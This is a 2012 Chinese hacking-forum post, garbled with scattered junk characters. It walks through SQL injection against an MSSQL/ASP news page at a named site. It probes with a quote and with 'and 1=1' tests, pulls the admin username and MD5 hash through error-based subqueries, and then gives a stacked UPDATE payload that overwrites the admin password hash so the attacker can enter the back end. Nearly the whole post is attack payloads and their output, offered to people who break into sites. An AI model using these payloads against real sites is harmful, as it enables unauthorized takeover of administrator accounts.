经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
! V% U; P, N l6 y0 D6 H5 a( y3 G0 \可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
_2 R6 P, p4 k3 U测试如下:
! ?# K$ E3 G( B, O% f) ahttp://www.tmdsb.com/news.asp?id=121
x! B8 e: V* y% u+ p在地址后输入单引号,显示% e" B8 F, \# V _- _) b0 ]
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
2 _, p4 Y* |* B4 A/ E字符串 ’’’ 之前有未闭合的引号. p+ G8 G% T! N
/news/tmdws.asp,行63
1 V5 O+ S) I- [/ c) T$ g. V说明没有过滤单引号且数据库是MSSQL.% o' y1 Q: y4 T5 v3 _. ?! J
and 1=1正常。and 1=2出错。肯定存在注入, ^4 {: J. B4 Q1 P
接着输入
C1 Z9 t+ o+ f9 lhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
4 G, c3 X' I$ p H得到帐号为:admin
`* a* A, V$ w3 x! ^& ~6 I7 Qhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
8 B/ c' g! S6 `) Y8 I6 B得到密码为:a4716077c2ba075c
: z5 |; _2 T0 s$ @9 D接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f294334 {; p( f( R# Z- W6 B4 C% v4 G
命令如下 :
( \3 q2 ~( s0 {;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–2 N6 ?5 i( n9 W) I& m
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41